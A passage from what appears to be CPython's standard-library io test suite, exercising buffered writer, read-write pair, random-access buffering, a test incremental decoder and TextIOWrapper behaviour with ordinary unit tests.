self.assertFalse(writer._write_stack)
buffer = bytearray(b"def")
bufio.write(buffer)
buffer[:] = b"***" # Overwrite our copy of the data
bufio.flush()
self.assertEqual(b"".join(writer._write_stack), b"abcdef")
def test_write_overflow(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
contents = b"abcdefghijklmnop"
for n in range(0, len(contents), 3):
bufio.write(contents[n:n+3])
flushed = b"".join(writer._write_stack)
# At least (total - 8) bytes were implicitly flushed, perhaps more
# depending on the implementation.
self.assertTrue(flushed.startswith(contents[:-8]), flushed)
def check_writes(self, intermediate_func):
# Lots of writes, test the flushed output is as expected.
contents = bytes(range(256)) * 1000
n = 0
writer = self.MockRawIO()
bufio = self.tp(writer, 13)
# Generator of write sizes: repeat each N 15 times then proceed to N+1
def gen_sizes():
for size in count(1):
for i in range(15):
yield size
sizes = gen_sizes()
while n < len(contents):
size = min(next(sizes), len(contents) - n)
self.assertEqual(bufio.write(contents[n:n+size]), size)
intermediate_func(bufio)
n += size
bufio.flush()
self.assertEqual(contents, b"".join(writer._write_stack))
def test_writes(self):
self.check_writes(lambda bufio: None)
def test_writes_and_flushes(self):
self.check_writes(lambda bufio: bufio.flush())
def test_writes_and_seeks(self):
def _seekabs(bufio):
pos = bufio.tell()
bufio.seek(pos + 1, 0)
bufio.seek(pos - 1, 0)
bufio.seek(pos, 0)
self.check_writes(_seekabs)
def _seekrel(bufio):
pos = bufio.seek(0, 1)
bufio.seek(+1, 1)
bufio.seek(-1, 1)
bufio.seek(pos, 0)
self.check_writes(_seekrel)
def test_writes_and_truncates(self):
self.check_writes(lambda bufio: bufio.truncate(bufio.tell()))
def test_write_non_blocking(self):
raw = self.MockNonBlockWriterIO()
bufio = self.tp(raw, 8)
self.assertEqual(bufio.write(b"abcd"), 4)
self.assertEqual(bufio.write(b"efghi"), 5)
# 1 byte will be written, the rest will be buffered
raw.block_on(b"k")
self.assertEqual(bufio.write(b"jklmn"), 5)
# 8 bytes will be written, 8 will be buffered and the rest will be lost
raw.block_on(b"0")
try:
bufio.write(b"opqrwxyz0123456789")
except self.BlockingIOError as e:
written = e.characters_written
else:
self.fail("BlockingIOError should have been raised")
self.assertEqual(written, 16)
self.assertEqual(raw.pop_written(),
b"abcdefghijklmnopqrwxyz")
self.assertEqual(bufio.write(b"ABCDEFGHI"), 9)
s = raw.pop_written()
# Previously buffered bytes were flushed
self.assertTrue(s.startswith(b"01234567A"), s)
def test_write_and_rewind(self):
raw = io.BytesIO()
bufio = self.tp(raw, 4)
self.assertEqual(bufio.write(b"abcdef"), 6)
self.assertEqual(bufio.tell(), 6)
bufio.seek(0, 0)
self.assertEqual(bufio.write(b"XY"), 2)
bufio.seek(6, 0)
self.assertEqual(raw.getvalue(), b"XYcdef")
self.assertEqual(bufio.write(b"123456"), 6)
bufio.flush()
self.assertEqual(raw.getvalue(), b"XYcdef123456")
def test_flush(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
bufio.flush()
self.assertEqual(b"abc", writer._write_stack[0])
def test_writelines(self):
l = [b'ab', b'cd', b'ef']
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.writelines(l)
bufio.flush()
self.assertEqual(b''.join(writer._write_stack), b'abcdef')
def test_writelines_userlist(self):
l = UserList([b'ab', b'cd', b'ef'])
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.writelines(l)
bufio.flush()
self.assertEqual(b''.join(writer._write_stack), b'abcdef')
def test_writelines_error(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
self.assertRaises(TypeError, bufio.writelines, [1, 2, 3])
self.assertRaises(TypeError, bufio.writelines, None)
self.assertRaises(TypeError, bufio.writelines, 'abc')
def test_destructor(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
del bufio
support.gc_collect()
self.assertEqual(b"abc", writer._write_stack[0])
def test_truncate(self):
# Truncate implicitly flushes the buffer.
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
with self.open(os_helper.TESTFN, self.write_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
bufio.write(b"abcdef")
self.assertEqual(bufio.truncate(3), 3)
self.assertEqual(bufio.tell(), 6)
with self.open(os_helper.TESTFN, "rb", buffering=0) as f:
self.assertEqual(f.read(), b"abc")
def test_truncate_after_write(self):
# Ensure that truncate preserves the file position after
# writes longer than the buffer size.
# Issue: https://bugs.python.org/issue32228
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
with self.open(os_helper.TESTFN, "wb") as f:
# Fill with some buffer
f.write(b'\x00' * 10000)
buffer_sizes = [8192, 4096, 200]
for buffer_size in buffer_sizes:
with self.open(os_helper.TESTFN, "r+b", buffering=buffer_size) as f:
f.write(b'\x00' * (buffer_size + 1))
# After the write, write_pos and write_end are set to 0
f.read(1)
# The read operation makes sure that pos != raw_pos
f.truncate()
self.assertEqual(f.tell(), buffer_size + 2)
@support.requires_resource('cpu')
@threading_helper.requires_working_threading()
def test_threads(self):
try:
# Write out many bytes from many threads and test they were
# all flushed.
N = 1000
contents = bytes(range(256)) * N
sizes = cycle([1, 19])
n = 0
queue = deque()
while n < len(contents):
size = next(sizes)
queue.append(contents[n:n+size])
n += size
del contents
# We use a real file object because it allows us to
# exercise situations where the GIL is released before
# writing the buffer to the raw streams. This is in addition
# to concurrency issues due to switching threads in the middle
# of Python code.
with self.open(os_helper.TESTFN, self.write_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
errors = []
def f():
try:
while True:
try:
s = queue.popleft()
except IndexError:
return
bufio.write(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
with threading_helper.start_threads(threads):
time.sleep(0.02) # yield
self.assertFalse(errors,
"the following exceptions were caught: %r" % errors)
bufio.close()
with self.open(os_helper.TESTFN, "rb") as f:
s = f.read()
for i in range(256):
self.assertEqual(s.count(bytes([i])), N)
finally:
os_helper.unlink(os_helper.TESTFN)
def test_misbehaved_io(self):
rawio = self.MisbehavedRawIO()
bufio = self.tp(rawio, 5)
self.assertRaises(OSError, bufio.seek, 0)
self.assertRaises(OSError, bufio.tell)
self.assertRaises(OSError, bufio.write, b"abcdef")
# Silence destructor error
bufio.close = lambda: None
def test_max_buffer_size_removal(self):
with self.assertRaises(TypeError):
self.tp(self.MockRawIO(), 8, 12)
def test_write_error_on_close(self):
raw = self.MockRawIO()
def bad_write(b):
raise OSError()
raw.write = bad_write
b = self.tp(raw)
b.write(b'spam')
self.assertRaises(OSError, b.close) # exception not swallowed
self.assertTrue(b.closed)
@threading_helper.requires_working_threading()
def test_slow_close_from_thread(self):
# Issue #31976
rawio = self.SlowFlushRawIO()
bufio = self.tp(rawio, 8)
t = threading.Thread(target=bufio.close)
t.start()
rawio.in_flush.wait()
self.assertRaises(ValueError, bufio.write, b'spam')
self.assertTrue(bufio.closed)
t.join()
class CBufferedWriterTest(BufferedWriterTest, SizeofTest):
tp = io.BufferedWriter
@skip_if_sanitizer(memory=True, address=True, reason="sanitizer defaults to crashing "
"instead of returning NULL for malloc failure.")
def test_constructor(self):
BufferedWriterTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2 GiB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_initialization(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.write, b"def")
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.write, b"def")
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
self.assertRaises(ValueError, bufio.write, b"def")
def test_garbage_collection(self):
# C BufferedWriter objects are collected, and collecting them flushes
# all data to disk.
# The Python version has __del__, so it would end up in gc.garbage instead
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
with warnings_helper.check_warnings(('', ResourceWarning)):
rawio = self.FileIO(os_helper.TESTFN, "w+b")
f = self.tp(rawio)
f.write(b"123xxx")
f.x = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(os_helper.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"123xxx")
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedWriter"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedWriterTest(BufferedWriterTest):
tp = pyio.BufferedWriter
class BufferedRWPairTest(unittest.TestCase):
def test_constructor(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.closed)
def test_uninitialized(self):
pair = self.tp.__new__(self.tp)
del pair
pair = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
pair.read, 0)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
pair.write, b'')
pair.__init__(self.MockRawIO(), self.MockRawIO())
self.assertEqual(pair.read(0), b'')
self.assertEqual(pair.write(b''), 0)
def test_detach(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertRaises(self.UnsupportedOperation, pair.detach)
def test_constructor_max_buffer_size_removal(self):
with self.assertRaises(TypeError):
self.tp(self.MockRawIO(), self.MockRawIO(), 8, 12)
def test_constructor_with_not_readable(self):
class NotReadable(MockRawIO):
def readable(self):
return False
self.assertRaises(OSError, self.tp, NotReadable(), self.MockRawIO())
def test_constructor_with_not_writeable(self):
class NotWriteable(MockRawIO):
def writable(self):
return False
self.assertRaises(OSError, self.tp, self.MockRawIO(), NotWriteable())
def test_read(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertEqual(pair.read(3), b"abc")
self.assertEqual(pair.read(1), b"d")
self.assertEqual(pair.read(), b"ef")
pair = self.tp(self.BytesIO(b"abc"), self.MockRawIO())
self.assertEqual(pair.read(None), b"abc")
def test_readlines(self):
pair = lambda: self.tp(self.BytesIO(b"abc\ndef\nh"), self.MockRawIO())
self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
self.assertEqual(pair().readlines(5), [b"abc\n", b"def\n"])
def test_read1(self):
# .read1() is delegated to the underlying reader object, so this test
# can be shallow.
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertEqual(pair.read1(3), b"abc")
self.assertEqual(pair.read1(), b"def")
def test_readinto(self):
for method in ("readinto", "readinto1"):
with self.subTest(method):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
data = byteslike(b'\0' * 5)
self.assertEqual(getattr(pair, method)(data), 5)
self.assertEqual(bytes(data), b"abcde")
def test_write(self):
w = self.MockRawIO()
pair = self.tp(self.MockRawIO(), w)
pair.write(b"abc")
pair.flush()
buffer = bytearray(b"def")
pair.write(buffer)
buffer[:] = b"***" # Overwrite our copy of the data
pair.flush()
self.assertEqual(w._write_stack, [b"abc", b"def"])
def test_peek(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertTrue(pair.peek(3).startswith(b"abc"))
self.assertEqual(pair.read(3), b"abc")
def test_readable(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertTrue(pair.readable())
def test_writeable(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertTrue(pair.writable())
def test_seekable(self):
# BufferedRWPairs are never seekable, even if their readers and writers
# are.
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.seekable())
# .flush() is delegated to the underlying writer object and has been
# tested in the test_write method.
def test_close_and_closed(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.closed)
pair.close()
self.assertTrue(pair.closed)
def test_reader_close_error_on_close(self):
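# If the reader's close() raises, the pair must still report closed and the
# writer must still be closed; the reader stays open because its close() never
# completed.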
def reader_close():
reader_non_existing
reader = self.MockRawIO()
reader.close = reader_close
writer = self.MockRawIO()
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('reader_non_existing', str(err.exception))
self.assertTrue(pair.closed)
self.assertFalse(reader.closed)
self.assertTrue(writer.closed)
# Silence destructor error
reader.close = lambda: None
def test_writer_close_error_on_close(self):
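# Conversely, if the writer's close() raises, the reader is still closed, but
# the pair does not report closed and the writer stays open.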
def writer_close():
writer_non_existing
reader = self.MockRawIO()
writer = self.MockRawIO()
writer.close = writer_close
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('writer_non_existing', str(err.exception))
self.assertFalse(pair.closed)
self.assertTrue(reader.closed)
self.assertFalse(writer.closed)
# Silence destructor error
writer.close = lambda: None
writer = None
# Ignore BufferedWriter (of the BufferedRWPair) unraisable exception
with support.catch_unraisable_exception():
# Ignore BufferedRWPair unraisable exception
with support.catch_unraisable_exception():
pair = None
support.gc_collect()
support.gc_collect()
def test_reader_writer_close_error_on_close(self):
def reader_close():
reader_non_existing
def writer_close():
writer_non_existing
reader = self.MockRawIO()
reader.close = reader_close
writer = self.MockRawIO()
writer.close = writer_close
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('reader_non_existing', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('writer_non_existing', str(err.exception.__context__))
self.assertFalse(pair.closed)
self.assertFalse(reader.closed)
self.assertFalse(writer.closed)
# Silence destructor error
reader.close = lambda: None
writer.close = lambda: None
def test_isatty(self):
class SelectableIsAtty(MockRawIO):
def __init__(self, isatty):
MockRawIO.__init__(self)
self._isatty = isatty
def isatty(self):
return self._isatty
pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(False))
self.assertFalse(pair.isatty())
pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(False))
self.assertTrue(pair.isatty())
pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(True))
self.assertTrue(pair.isatty())
pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(True))
self.assertTrue(pair.isatty())
def test_weakref_clearing(self):
brw = self.tp(self.MockRawIO(), self.MockRawIO())
ref = weakref.ref(brw)
brw = None
ref = None # Shouldn't segfault.
class CBufferedRWPairTest(BufferedRWPairTest):
tp = io.BufferedRWPair
class PyBufferedRWPairTest(BufferedRWPairTest):
tp = pyio.BufferedRWPair
class BufferedRandomTest(BufferedReaderTest, BufferedWriterTest):
read_mode = "rb+"
write_mode = "wb+"
def test_constructor(self):
BufferedReaderTest.test_constructor(self)
BufferedWriterTest.test_constructor(self)
def test_uninitialized(self):
BufferedReaderTest.test_uninitialized(self)
BufferedWriterTest.test_uninitialized(self)
def test_read_and_write(self):
raw = self.MockRawIO((b"asdf", b"ghjk"))
rw = self.tp(raw, 8)
self.assertEqual(b"as", rw.read(2))
rw.write(b"ddd")
rw.write(b"eee")
self.assertFalse(raw._write_stack) # Buffer writes
self.assertEqual(b"ghjk", rw.read())
self.assertEqual(b"dddeee", raw._write_stack[0])
def test_seek_and_tell(self):
raw = self.BytesIO(b"asdfghjkl")
rw = self.tp(raw)
self.assertEqual(b"as", rw.read(2))
self.assertEqual(2, rw.tell())
rw.seek(0, 0)
self.assertEqual(b"asdf", rw.read(4))
rw.write(b"123f")
rw.seek(0, 0)
self.assertEqual(b"asdf123fl", rw.read())
self.assertEqual(9, rw.tell())
rw.seek(-4, 2)
self.assertEqual(5, rw.tell())
rw.seek(2, 1)
self.assertEqual(7, rw.tell())
self.assertEqual(b"fl", rw.read(11))
rw.flush()
self.assertEqual(b"asdf123fl", raw.getvalue())
self.assertRaises(TypeError, rw.seek, 0.0)
def check_flush_and_read(self, read_func):
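# Shared helper: reads and writes are interleaved on the same object; flush()
# must push the pending writes without disturbing the read position, and it
# also drops the read buffer so later reads see changes made directly on the
# raw stream (the XYZ overwrite below).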
raw = self.BytesIO(b"abcdefghi")
bufio = self.tp(raw)
self.assertEqual(b"ab", read_func(bufio, 2))
bufio.write(b"12")
self.assertEqual(b"ef", read_func(bufio, 2))
self.assertEqual(6, bufio.tell())
bufio.flush()
self.assertEqual(6, bufio.tell())
self.assertEqual(b"ghi", read_func(bufio))
raw.seek(0, 0)
raw.write(b"XYZ")
# flush() resets the read buffer
bufio.flush()
bufio.seek(0, 0)
self.assertEqual(b"XYZ", read_func(bufio, 3))
def test_flush_and_read(self):
self.check_flush_and_read(lambda bufio, *args: bufio.read(*args))
def test_flush_and_readinto(self):
def _readinto(bufio, n=-1):
b = bytearray(n if n >= 0 else 9999)
n = bufio.readinto(b)
return bytes(b[:n])
self.check_flush_and_read(_readinto)
def test_flush_and_peek(self):
def _peek(bufio, n=-1):
# This relies on the fact that the buffer can contain the whole
# raw stream, otherwise peek() can return less.
b = bufio.peek(n)
if n != -1:
b = b[:n]
bufio.seek(len(b), 1)
return b
self.check_flush_and_read(_peek)
def test_flush_and_write(self):
raw = self.BytesIO(b"abcdefghi")
bufio = self.tp(raw)
bufio.write(b"123")
bufio.flush()
bufio.write(b"45")
bufio.flush()
bufio.seek(0, 0)
self.assertEqual(b"12345fghi", raw.getvalue())
self.assertEqual(b"12345fghi", bufio.read())
def test_threads(self):
BufferedReaderTest.test_threads(self)
BufferedWriterTest.test_threads(self)
def test_writes_and_peek(self):
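# Reuse the inherited check_writes() helper with peek/read/read1/readinto hooks
# mixed in (this test and the ones below), to check that reads landing inside
# the write buffer do not corrupt the data that eventually gets flushed.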
def _peek(bufio):
bufio.peek(1)
self.check_writes(_peek)
def _peek(bufio):
pos = bufio.tell()
bufio.seek(-1, 1)
bufio.peek(1)
bufio.seek(pos, 0)
self.check_writes(_peek)
def test_writes_and_reads(self):
def _read(bufio):
bufio.seek(-1, 1)
bufio.read(1)
self.check_writes(_read)
def test_writes_and_read1s(self):
def _read1(bufio):
bufio.seek(-1, 1)
bufio.read1(1)
self.check_writes(_read1)
def test_writes_and_readintos(self):
def _read(bufio):
bufio.seek(-1, 1)
bufio.readinto(bytearray(1))
self.check_writes(_read)
def test_write_after_readahead(self):
# Issue #6629: writing after the buffer was filled by readahead should
# first rewind the raw stream.
for overwrite_size in [1, 5]:
raw = self.BytesIO(b"A" * 10)
bufio = self.tp(raw, 4)
# Trigger readahead
self.assertEqual(bufio.read(1), b"A")
self.assertEqual(bufio.tell(), 1)
# Overwriting should rewind the raw stream if needed
bufio.write(b"B" * overwrite_size)
self.assertEqual(bufio.tell(), overwrite_size + 1)
# If the write size was smaller than the buffer size, flush() and
# check that rewind happens.
bufio.flush()
self.assertEqual(bufio.tell(), overwrite_size + 1)
s = raw.getvalue()
self.assertEqual(s,
b"A" + b"B" * overwrite_size + b"A" * (9 - overwrite_size))
def test_write_rewind_write(self):
# Various combinations of reading / writing / seeking backwards / writing again
def mutate(bufio, pos1, pos2):
assert pos2 >= pos1
# Fill the buffer
bufio.seek(pos1)
bufio.read(pos2 - pos1)
bufio.write(b'\x02')
# This writes earlier than the previous write, but still inside
# the buffer.
bufio.seek(pos1)
bufio.write(b'\x01')
b = b"\x80\x81\x82\x83\x84"
for i in range(0, len(b)):
for j in range(i, len(b)):
raw = self.BytesIO(b)
bufio = self.tp(raw, 100)
mutate(bufio, i, j)
bufio.flush()
expected = bytearray(b)
expected[j] = 2
expected[i] = 1
self.assertEqual(raw.getvalue(), expected,
"failed result for i=%d, j=%d" % (i, j))
def test_truncate_after_read_or_write(self):
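# truncate() with no argument cuts at the current logical position, which has
# to account for both buffered reads and pending writes.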
raw = self.BytesIO(b"A" * 10)
bufio = self.tp(raw, 100)
self.assertEqual(bufio.read(2), b"AA") # the read buffer gets filled
self.assertEqual(bufio.truncate(), 2)
self.assertEqual(bufio.write(b"BB"), 2) # the write buffer increases
self.assertEqual(bufio.truncate(), 4)
def test_misbehaved_io(self):
BufferedReaderTest.test_misbehaved_io(self)
BufferedWriterTest.test_misbehaved_io(self)
def test_interleaved_read_write(self):
# Test for issue #12213
with self.BytesIO(b'abcdefgh') as raw:
with self.tp(raw, 100) as f:
f.write(b"1")
self.assertEqual(f.read(1), b'b')
f.write(b'2')
self.assertEqual(f.read1(1), b'd')
f.write(b'3')
buf = bytearray(1)
f.readinto(buf)
self.assertEqual(buf, b'f')
f.write(b'4')
self.assertEqual(f.peek(1), b'h')
f.flush()
self.assertEqual(raw.getvalue(), b'1b2d3f4h')
with self.BytesIO(b'abc') as raw:
with self.tp(raw, 100) as f:
self.assertEqual(f.read(1), b'a')
f.write(b"2")
self.assertEqual(f.read(1), b'c')
f.flush()
self.assertEqual(raw.getvalue(), b'a2c')
def test_interleaved_readline_write(self):
with self.BytesIO(b'ab\ncdef\ng\n') as raw:
with self.tp(raw) as f:
f.write(b'1')
self.assertEqual(f.readline(), b'b\n')
f.write(b'2')
self.assertEqual(f.readline(), b'def\n')
f.write(b'3')
self.assertEqual(f.readline(), b'\n')
f.flush()
self.assertEqual(raw.getvalue(), b'1b\n2def\n3\n')
# You can't construct a BufferedRandom over a non-seekable stream.
test_unseekable = None
# writable() returns True, so there's no point in testing it over
# a writable stream.
test_truncate_on_read_only = None
class CBufferedRandomTest(BufferedRandomTest, SizeofTest):
tp = io.BufferedRandom
@skip_if_sanitizer(memory=True, address=True, reason= "sanitizer defaults to crashing "
"instead of returning NULL for malloc failure.")
def test_constructor(self):
BufferedRandomTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2 GiB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_garbage_collection(self):
CBufferedReaderTest.test_garbage_collection(self)
CBufferedWriterTest.test_garbage_collection(self)
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedRandom"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedRandomTest(BufferedRandomTest):
tp = pyio.BufferedRandom
# To fully exercise seek/tell, the StatefulIncrementalDecoder has these
# properties:
# - A single output character can correspond to many bytes of input.
# - The number of input bytes to complete the character can be
# undetermined until the last input byte is received.
# - The number of input bytes can vary depending on previous input.
# - A single input byte can correspond to many characters of output.
# - The number of output characters can be undetermined until the
# last input byte is received.
# - The number of output characters can vary depending on previous input.
class StatefulIncrementalDecoder(codecs.IncrementalDecoder):
"""
For testing seek/tell behavior with a stateful, buffering decoder.
Input is a sequence of words. Words may be fixed-length (length set
by input) or variable-length (period-terminated). In variable-length
mode, extra periods are ignored. Possible words are:
- 'i' followed by a number sets the input length, I (maximum 99).
When I is set to 0, words are variable-length (period-terminated).
- 'o' followed by a number sets the output length, O (maximum 99).
- Any other word is converted into a word followed by a period on
the output. The output word consists of the input word truncated
or padded out with hyphens to make its length equal to O. If O
is 0, the word is output verbatim without truncating or padding.
I and O are initially set to 1. When I changes, any buffered input is
re-scanned according to the new I. EOF also terminates the last word.
"""
def __init__(self, errors='strict'):
codecs.IncrementalDecoder.__init__(self, errors)
self.reset()
def __repr__(self):
return '<SID %x>' % id(self)
def reset(self):
self.i = 1
self.o = 1
self.buffer = bytearray()
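# getstate() must return a (buffered_input, int_flags) pair, so both lengths
# are packed into a single integer as i*100 + o; XOR-ing with 1 makes the flags
# value 0 right after reset() (when i == o == 1).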
def getstate(self):
i, o = self.i ^ 1, self.o ^ 1 # so that flags = 0 after reset()
return bytes(self.buffer), i*100 + o
def setstate(self, state):
buffer, io = state
self.buffer = bytearray(buffer)
i, o = divmod(io, 100)
self.i, self.o = i ^ 1, o ^ 1
def decode(self, input, final=False):
output = ''
for b in input:
if self.i == 0: # variable-length, terminated with period
if b == ord('.'):
if self.buffer:
output += self.process_word()
else:
self.buffer.append(b)
else: # fixed-length, terminate after self.i bytes
self.buffer.append(b)
if len(self.buffer) == self.i:
output += self.process_word()
if final and self.buffer: # EOF terminates the last word
output += self.process_word()
return output
def process_word(self):
output = ''
if self.buffer[0] == ord('i'):
self.i = min(99, int(self.buffer[1:] or 0)) # set input length
elif self.buffer[0] == ord('o'):
self.o = min(99, int(self.buffer[1:] or 0)) # set output length
else:
output = self.buffer.decode('ascii')
if len(output) < self.o:
output += '-'*self.o # pad out with hyphens
if self.o:
output = output[:self.o] # truncate to output length
output += '.'
self.buffer = bytearray()
return output
codecEnabled = False
# bpo-41919: This method is separated from StatefulIncrementalDecoder to avoid a resource leak
# when registering codecs and cleanup functions.
def lookupTestDecoder(name):
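# Codec search function: TextIOWrapperTest.setUp() registers it via
# codecs.register(), and it only resolves the name 'test_decoder' while
# StatefulIncrementalDecoder.codecEnabled is set.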
if StatefulIncrementalDecoder.codecEnabled and name == 'test_decoder':
latin1 = codecs.lookup('latin-1')
return codecs.CodecInfo(
name='test_decoder', encode=latin1.encode, decode=None,
incrementalencoder=None,
streamreader=None, streamwriter=None,
incrementaldecoder=StatefulIncrementalDecoder)
class StatefulIncrementalDecoderTest(unittest.TestCase):
"""
Make sure the StatefulIncrementalDecoder actually works.
"""
test_cases = [
# I=1, O=1 (fixed-length input == fixed-length output)
(b'abcd', False, 'a.b.c.d.'),
# I=0, O=0 (variable-length input, variable-length output)
(b'oiabcd', True, 'abcd.'),
# I=0, O=0 (should ignore extra periods)
(b'oi...abcd...', True, 'abcd.'),
# I=0, O=6 (variable-length input, fixed-length output)
(b'i.o6.x.xyz.toolongtofit.', False, 'x-----.xyz---.toolon.'),
# I=2, O=6 (fixed-length input < fixed-length output)
(b'i.i2.o6xyz', True, 'xy----.z-----.'),
# I=6, O=3 (fixed-length input > fixed-length output)
(b'i.o3.i6.abcdefghijklmnop', True, 'abc.ghi.mno.'),
# I=0, then 3; O=29, then 15 (with longer output)
(b'i.o29.a.b.cde.o15.abcdefghijabcdefghij.i3.a.b.c.d.ei00k.l.m', True,
'a----------------------------.' +
'b----------------------------.' +
'cde--------------------------.' +
'abcdefghijabcde.' +
'a.b------------.' +
'.c.------------.' +
'd.e------------.' +
'k--------------.' +
'l--------------.' +
'm--------------.')
]
def test_decoder(self):
# Try a few one-shot test cases.
for input, eof, output in self.test_cases:
d = StatefulIncrementalDecoder()
self.assertEqual(d.decode(input, eof), output)
# Also test an unfinished decode, followed by forcing EOF.
d = StatefulIncrementalDecoder()
self.assertEqual(d.decode(b'oiabcd'), '')
self.assertEqual(d.decode(b'', 1), 'abcd.')
class TextIOWrapperTest(unittest.TestCase):
def setUp(self):
self.testdata = b"AAA\r\nBBB\rCCC\r\nDDD\nEEE\r\n"
self.normalized = b"AAA\nBBB\nCCC\nDDD\nEEE\n".decode("ascii")
os_helper.unlink(os_helper.TESTFN)
codecs.register(lookupTestDecoder)
self.addCleanup(codecs.unregister, lookupTestDecoder)
def tearDown(self):
os_helper.unlink(os_helper.TESTFN)
def test_constructor(self):
r = self.BytesIO(b"\xc3\xa9\n\n")
b = self.BufferedReader(r, 1000)
t = self.TextIOWrapper(b, encoding="utf-8")
t.__init__(b, encoding="latin-1", newline="\r\n")
self.assertEqual(t.encoding, "latin-1")
self.assertEqual(t.line_buffering, False)
t.__init__(b, encoding="utf-8", line_buffering=True)
self.assertEqual(t.encoding, "utf-8")
self.assertEqual(t.line_buffering, True)
self.assertEqual("\xe9\n", t.readline())
self.assertRaises(TypeError, t.__init__, b, encoding="utf-8", newline=42)
self.assertRaises(ValueError, t.__init__, b, encoding="utf-8", newline='xyzzy')
def test_uninitialized(self):
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
del t
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
self.assertRaises(Exception, repr, t)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
t.read, 0)
t.__init__(self.MockRawIO(), encoding="utf-8")
self.assertEqual(t.read(0), '')
def test_non_text_encoding_codecs_are_rejected(self):
# Ensure the constructor complains if passed a codec that isn't
# marked as a text encoding
# http://bugs.python.org/issue20404
r = self.BytesIO()
b = self.BufferedWriter(r)
with self.assertRaisesRegex(LookupError, "is not a text encoding"):
self.TextIOWrapper(b, encoding="hex")
def test_detach(self):
r = self.BytesIO()
b = self.BufferedWriter(r)
t = self.TextIOWrapper(b, encoding="ascii")
self.assertIs(t.detach(), b)
t = self.TextIOWrapper(b, encoding="ascii")
t.write("howdy")
self.assertFalse(r.getvalue())
t.detach()
self.assertEqual(r.getvalue(), b"howdy")
self.assertRaises(ValueError, t.detach)
# Operations independent of the detached stream should still work
repr(t)
self.assertEqual(t.encoding, "ascii")
self.assertEqual(t.errors, "strict")
self.assertFalse(t.line_buffering)
self.assertFalse(t.write_through)
def test_repr(self):
raw = self.BytesIO("hello".encode("utf-8"))
b = self.BufferedReader(raw)
t = self.TextIOWrapper(b, encoding="utf-8")
modname = self.TextIOWrapper.__module__
self.assertRegex(repr(t),
r"<(%s\.)?TextIOWrapper encoding='utf-8'>" % modname)
raw.name = "dummy"
self.assertRegex(repr(t),
r"<(%s\.)?TextIOWrapper name='dummy' encoding='utf-8'>" % modname)
t.mode = "r"
self.assertRegex(repr(t),
r"<(%s\.)?TextIOWrapper name='dummy' mode='r' encoding='utf-8'>" % modname)
raw.name = b"dummy"
self.assertRegex(repr(t),
r"<(%s\.)?TextIOWrapper name=b'dummy' mode='r' encoding='utf-8'>" % modname)
t.buffer.detach()
repr(t) # Should not raise an exception
def test_recursive_repr(self):
# Issue #25455
raw = self.BytesIO()
t = self.TextIOWrapper(raw, encoding="utf-8")
with support.swap_attr(raw, 'name', t):
try:
repr(t) # Should not crash
except RuntimeError:
pass
def test_line_buffering(self):
r = self.BytesIO()
b = self.BufferedWriter(r, 1000)
